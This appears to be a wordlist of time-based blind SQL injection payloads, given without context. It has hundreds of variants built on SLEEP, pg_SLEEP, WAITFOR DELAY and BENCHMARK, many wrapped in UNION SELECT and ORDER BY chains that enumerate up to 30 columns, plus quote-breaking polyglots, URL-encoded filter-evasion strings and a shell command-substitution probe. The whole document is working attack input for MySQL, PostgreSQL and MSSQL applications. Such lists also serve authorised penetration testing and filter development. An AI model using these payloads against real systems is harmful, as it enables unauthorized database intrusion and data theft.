if(now()=sysdate()%2Csleep(20)%2C0)
1'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
"XOR(if(now()=sysdate(),sleep(20),0))XOR"
'XOR(SELECT(0)FROM(SELECT(SLEEP(20)))a)XOR'Z
,(select * from (select(sleep(20)))a)
%2c(select%20*%20from%20(select(sleep(20)))a)
';WAITFOR DELAY '0:0:20'--
waitfor delay '00:00:20'
waitfor delay '00:00:20'--
waitfor delay '00:00:20'#
sleep(20)#
1 or sleep(20)#
" or sleep(20)#
' or sleep(20)#
" or sleep(20)="
' or sleep(20)='
1) or sleep(20)#
") or sleep(20)="
') or sleep(20)='
1)) or sleep(20)#
")) or sleep(20)="
')) or sleep(20)='
SLEEP(1)/*' or SLEEP(20) or '" or SLEEP(20) or "*/
+ SLEEP(20) + '
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)--
pg_SLEEP(20)
pg_SLEEP(20)--
pg_SLEEP(20)#
or pg_SLEEP(20)
or pg_SLEEP(20)--
or pg_SLEEP(20)#
'\"
AnD SLEEP(20)
AnD SLEEP(20)--
AnD SLEEP(20)#
&&SLEEP(20)
&&SLEEP(20)--
&&SLEEP(20)#
' AnD SLEEP(20) ANd '1
'&&SLEEP(20)&&'1
ORDER BY SLEEP(20)
ORDER BY SLEEP(20)--
ORDER BY SLEEP(20)#
pg_sleep(20)--
1 or pg_sleep(20)--
" or pg_sleep(20)--
' or pg_sleep(20)--
1) or pg_sleep(20)--
") or pg_sleep(20)--
') or pg_sleep(20)--
1)) or pg_sleep(20)--
")) or pg_sleep(20)--
')) or pg_sleep(20)--
AND (SELECT * FROM (SELECT(SLEEP(20)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(20)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)#
SLEEP(20)#
SLEEP(20)--
SLEEP(20)="
SLEEP(20)='
or SLEEP(20)
or SLEEP(20)#
or SLEEP(20)--
or SLEEP(20)="
or SLEEP(20)='
UNION SELECT @@VERSION,SLEEP(20),3
UNION SELECT @@VERSION,SLEEP(20),USER(),4
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION SELECT @@VERSION,SLEEP(20),"'3
UNION SELECT @@VERSION,SLEEP(20),"'3'"#
UNION SELECT @@VERSION,SLEEP(20),USER(),4#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT SLEEP(20)-- 
UNION ALL SELECT USER(),SLEEP(20)-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20)-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A'))-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
ORDER BY 1,SLEEP(20)
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A'))
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDER BY 1,SLEEP(20)#
ORDER BY 1,SLEEP(20),3#
ORDER BY 1,SLEEP(20),3,4#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDER BY SLEEP(20)-- 
ORDER BY 1,SLEEP(20)-- 
ORDER BY 1,SLEEP(20),3-- 
ORDER BY 1,SLEEP(20),3,4-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(20*1),0))XOR'Z
if(now()=sysdate(),sleep(20),0)
'XOR(if(now()=sysdate(),sleep(20),0))XOR'
'XOR(if(now()=sysdate(),sleep(20*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Z
if(now()=sysdate(),sleep(20),0)/"XOR(if(now()=sysdate(),sleep(20),0))OR"/
if(now()=sysdate(),sleep(20),0)/*'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0))OR"*/
if(now()=sysdate(),sleep(20),0)/'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0) and 20=20)"/
if(1=1,sleep(20),0)/*'XOR(if(1=1,sleep(20),0))OR'"XOR(if(1=1,sleep(20),0))OR"*/
if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(20),0))OR"*/
SLEEP(20)/*' or SLEEP(20) or '" or SLEEP(20) or "*/
(select(0)from(select(sleep(20)))v)
(SELECT SLEEP(20))
'%2b(select*from(select(sleep(20)))a)%2b'
(select*from(select(sleep(20)))a)
1'%2b(select*from(select(sleep(20)))a)%2b'
desc%2c(select*from(select(sleep(20)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(20))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(20))A))
(SELECT * FROM (SELECT(SLEEP(20)))YYYY)
(SELECT * FROM (SELECT(SLEEP(20)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(20)))YYYY)--
'+(select*from(select(sleep(20)))a)+'
(select(0)from(select(sleep(20)))v)%2f'+(select(0)from(select(sleep(20)))v)+'"
(select(0)from(select(sleep(20)))v)%2f*'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"*%2f
(select(0)from(select(sleep(20)))v)/*'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"*/
(select(0)from(select(sleep(20)))v)/*'+(select(0)from(select(sleep(20)))v)+'\"+(select(0)from(select(sleep(20)))v)+\"*/
',''),/*test*/%26%26%09sLeEp(20)%09--+
1 and sleep 20--
1 and sleep 20
1 and sleep(20)--
1 and sleep(20)
' and sleep 20--
' and sleep 20
' and sleep 20 and '1'='1
' and sleep(20) and '1'='1
' and sleep(20)--
' and sleep(20)
and sleep 20--
and sleep 20
and sleep(20)--
and sleep(20)
and SELECT SLEEP(20); #
' AND SLEEP(20)#
" AND SLEEP(20)#
') AND SLEEP(20)#
OR BLIND:
or sleep 20--
or sleep 20
or sleep(20)--
or sleep(20)
or SELECT SLEEP(20); #
' OR SLEEP(20)#
" OR SLEEP(20)#
') OR SLEEP(20)#
)) or sleep(20)='
or sleep(20)#
%20'sleep%20200'
%20$(sleep%20200)
or sleep(20)='
) or sleep(20)='
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
